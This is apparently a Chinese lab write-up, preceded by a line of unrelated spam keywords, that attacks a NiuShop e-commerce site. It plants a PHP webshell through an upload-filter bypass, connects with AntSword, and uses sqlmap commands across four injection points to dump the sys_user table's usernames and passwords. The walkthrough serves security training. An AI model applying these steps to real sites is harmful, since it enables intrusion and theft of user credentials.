建设网站的协议,合肥市建设局,东营网站,叫人做网站后不提供源码1 文件上传漏洞
准备一句话文件wjr.php.png#xff0c;进入到更换头像的界面#xff0c;使用BP拦截选择文件的请求 拦截到请求后将wjr.php.png修改为wjr.php#xff0c;进行转发 由上图可以查看到上传目录为网站目录下的upload/avator,查看是否上传成功 使用时间戳在线工具…1 文件上传漏洞
准备一句话文件wjr.php.png进入到更换头像的界面使用BP拦截选择文件的请求 拦截到请求后将wjr.php.png修改为wjr.php进行转发 由上图可以查看到上传目录为网站目录下的upload/avator,查看是否上传成功 使用时间戳在线工具获取到上传文件的名称 打开中国蚁剑将上传文件对应的URL输入并在连接密码处输入cmd点击添加 双击进入后可以查看网站目录 2 SQL注入漏洞
2.1 第一个注入点
进入存在注入点的网页 输入id1 and 12进行测试如果与之前的显示不一样则存在SQL注入漏洞 2.2 第二个注入点
进入存在注入点的网页 使用BP拦截刷新界面的操作获取到请求流量并保存到wjr.txt中 打开SQLmap工具输入命令搜索是否存在注入点
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch输入命令获取所有的数据库
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch --dbs输入命令获取指定数据库的所有表
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 --tables输入命令获取注定数据库中指定表的所有字段
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user --columns输入命令获取指定数据库中的指定表的指定字段这里指定的是user_name和user_password–dump的作用是获取表中的信息
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user -C user_name,user_password --dump2.3 第三个注入点
第三个注入点在搜索中 使用BP截获搜索请求将请求保存在wjr.txt中并使用sqlmap进行测试 获取到数据库信息 2.4 第四个注入点
进入存在注入点的网页 使用BP拦截修改操作并将流量保存到wjr.txt中 使用SQLmap获取到数据库信息